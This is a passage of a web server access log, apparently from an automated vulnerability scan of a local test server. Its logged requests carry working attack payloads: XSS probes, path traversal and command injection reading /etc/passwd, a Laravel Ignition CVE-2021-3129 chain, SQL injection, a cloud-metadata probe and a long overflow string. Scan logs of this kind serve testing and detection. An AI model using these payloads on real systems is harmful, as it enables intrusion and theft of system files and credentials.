HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29N5EfF0Cuquu7iERoG8Jvqos9L.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.579","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.drone.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /install/install.php?step=4 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"op=login&username=;`cat /etc/passwd`&password=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"127.0.0.1/module/login/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5Eka43Ct0ZjTYQPBQE0ifFKy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=0776a6f87a8143af12c1e7bbd0bf4197 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cpqlogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /misc.php?action=showpopups&type=friend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_next/static/../server/pages-manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pdb/meta/v1/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:23 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA